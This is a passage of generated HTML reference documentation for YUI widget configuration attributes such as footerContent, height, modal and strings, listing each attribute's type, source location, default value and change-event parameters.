<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_footerContent" class="attr item inherited">
<a name="config_footerContent"></a>
<h3 class="name"><code>footerContent</code></h3>
<span class="type">HTML</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#attr_footerContent">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l160"><code>widget-stdmod/js/Widget-StdMod.js:160</code></a>
</p>
</div>
<div class="description">
<p>The content to be added to the footer section. This will replace any existing content
in the footer. If you want to append, or insert new content, use the <a href="#method_setStdModContent">setStdModContent</a> method.</p>
</div>
<p><strong>Default:</strong> undefined</p>
<div class="emits box">
<h4>Fires event <code>footerContentChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>footerContent</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_headerContent" class="attr item inherited">
<a name="config_headerContent"></a>
<h3 class="name"><code>headerContent</code></h3>
<span class="type">HTML</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#attr_headerContent">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l149"><code>widget-stdmod/js/Widget-StdMod.js:149</code></a>
</p>
</div>
<div class="description">
<p>The content to be added to the header section. This will replace any existing content
in the header. If you want to append, or insert new content, use the <a href="#method_setStdModContent">setStdModContent</a> method.</p>
</div>
<p><strong>Default:</strong> undefined</p>
<div class="emits box">
<h4>Fires event <code>headerContentChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>headerContent</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_height" class="attr item inherited">
<a name="config_height"></a>
<h3 class="name"><code>height</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#attr_height">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l252"><code>widget/js/Widget.js:252</code></a>
</p>
</div>
<div class="description">
<p>String with units, or number, representing the height of the Widget. If a number is provided,
the default unit, defined by the Widgets DEF_UNIT, property is used.</p>
</div>
<p><strong>Default:</strong> EMPTY_STR</p>
<div class="emits box">
<h4>Fires event <code>heightChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>height</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_hideOn" class="attr item inherited">
<a name="config_hideOn"></a>
<h3 class="name"><code>hideOn</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetAutohide.html#attr_hideOn">WidgetAutohide</a>:
<a href="../files/widget-autohide_js_Widget-Autohide.js.html#l57"><code>widget-autohide/js/Widget-Autohide.js:57</code></a>
</p>
</div>
<div class="description">
<p>An array of objects corresponding to the nodes, events, and keycodes to hide the widget on.
The implementer can supply an array of objects, with each object having the following properties:</p>
<p>eventName: (string, required): The eventName to listen to.</p>
<p>node: (Y.Node, optional): The Y.Node that will fire the event (defaults to the boundingBox of the widget)</p>
<p>keyCode: (string, optional): If listening for key events, specify the keyCode</p>
<p>By default, this attribute consists of one object which will cause the widget to hide if the
escape key is pressed.</p>
</div>
<div class="emits box">
<h4>Fires event <code>hideOnChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>hideOn</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_id" class="attr item inherited">
<a name="config_id"></a>
<h3 class="name"><code>id</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#attr_id">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l149"><code>widget/js/Widget.js:149</code></a>
</p>
</div>
<div class="description">
</div>
<p><strong>Default:</strong> Generated using guid()</p>
<div class="emits box">
<h4>Fires event <code>idChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>id</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_initialized" class="attr item inherited">
<a name="config_initialized"></a>
<h3 class="name"><code>initialized</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<span class="flag readonly">readonly</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#attr_initialized">BaseCore</a>:
<a href="../files/base_js_BaseCore.js.html#l144"><code>base/js/BaseCore.js:144</code></a>
</p>
</div>
<div class="description">
<p>Flag indicating whether or not this object
has been through the init lifecycle phase.</p>
</div>
<p><strong>Default:</strong> false</p>
<div class="emits box">
<h4>Fires event <code>initializedChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>initialized</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_locale" class="attr item deprecated inherited">
<a name="config_locale"></a>
<h3 class="name"><code>locale</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<span class="flag deprecated" title="Use Y.config.lang and Y.Intl externalization support">deprecated</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#attr_locale">Widget</a>:
<a href="../files/widget_js_WidgetLocale.js.html#l14"><code>widget/js/WidgetLocale.js:14</code></a>
</p>
<p>Deprecated: Use Y.config.lang and Y.Intl externalization support</p>
</div>
<div class="description">
<p>The default locale for the widget. NOTE: Using get/set on the "strings" attribute will
return/set strings for this locale.</p>
</div>
<p><strong>Default:</strong> "en"</p>
<div class="emits box">
<h4>Fires event <code>localeChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>locale</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_maskNode" class="attr item inherited">
<a name="config_maskNode"></a>
<h3 class="name"><code>maskNode</code></h3>
<span class="type">Y.Node</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#attr_maskNode">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l73"><code>widget-modality/js/Widget-Modality.js:73</code></a>
</p>
</div>
<div class="description">
<p>Returns a Y.Node instance of the node being used as the mask.</p>
</div>
<div class="emits box">
<h4>Fires event <code>maskNodeChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>maskNode</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_modal" class="attr item inherited">
<a name="config_modal"></a>
<h3 class="name"><code>modal</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#attr_modal">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l85"><code>widget-modality/js/Widget-Modality.js:85</code></a>
</p>
</div>
<div class="description">
<p>Whether the widget should be modal or not.</p>
</div>
<div class="emits box">
<h4>Fires event <code>modalChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>modal</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_preventOverlap" class="attr item inherited">
<a name="config_preventOverlap"></a>
<h3 class="name"><code>preventOverlap</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionConstrain.html#attr_preventOverlap">WidgetPositionConstrain</a>:
<a href="../files/widget-position-constrain_js_Widget-PositionConstrain.js.html#l68"><code>widget-position-constrain/js/Widget-PositionConstrain.js:68</code></a>
</p>
</div>
<div class="description">
<p>If set to true, and WidgetPositionAlign is also added to the Widget,
constrained positioning will attempt to prevent the widget's bounding box from overlapping
the element to which it has been aligned, by flipping the orientation of the alignment
for corner based alignments</p>
</div>
<div class="emits box">
<h4>Fires event <code>preventOverlapChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>preventOverlap</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_render" class="attr item inherited">
<a name="config_render"></a>
<h3 class="name"><code>render</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a> | <a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#attr_render">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l286"><code>widget/js/Widget.js:286</code></a>
</p>
</div>
<div class="description">
<p>Whether or not to render the widget automatically after init, and optionally, to which parent node.</p>
</div>
<div class="emits box">
<h4>Fires event <code>renderChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>render</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_rendered" class="attr item inherited">
<a name="config_rendered"></a>
<h3 class="name"><code>rendered</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<span class="flag readonly">readonly</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#attr_rendered">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l161"><code>widget/js/Widget.js:161</code></a>
</p>
</div>
<div class="description">
<p>Flag indicating whether or not this Widget
has been through the render lifecycle phase.</p>
</div>
<p><strong>Default:</strong> false</p>
<div class="emits box">
<h4>Fires event <code>renderedChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>rendered</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_shim" class="attr item inherited">
<a name="config_shim"></a>
<h3 class="name"><code>shim</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#attr_shim">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l74"><code>widget-stack/js/Widget-Stack.js:74</code></a>
</p>
</div>
<div class="description">
<p>Boolean flag to indicate whether or not a shim should be added to the Widgets
boundingBox, to protect it from select box bleedthrough.</p>
</div>
<p><strong>Default:</strong> false, for all browsers other than IE6, for which a shim is enabled by default.</p>
<div class="emits box">
<h4>Fires event <code>shimChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>shim</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_srcNode" class="attr item inherited">
<a name="config_srcNode"></a>
<h3 class="name"><code>srcNode</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#attr_srcNode">Widget</a>:
<a href="../files/widget_js_WidgetHTMLParser.js.html#l58"><code>widget/js/WidgetHTMLParser.js:58</code></a>
</p>
</div>
<div class="description">
<p>The DOM node to parse for configuration values, passed to the Widget's HTML_PARSER definition</p>
</div>
<div class="emits box">
<h4>Fires event <code>srcNodeChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>srcNode</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_strings" class="attr item inherited">
<a name="config_strings"></a>
<h3 class="name"><code>strings</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#attr_strings">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l274"><code>widget/js/Widget.js:274</code></a>
</p>
</div>
<div class="description">
<p>Collection of strings used to label elements of the Widget's UI.</p>
</div>
<p><strong>Default:</strong> null</p>
<div class="emits box">
<h4>Fires event <code>stringsChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>strings</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
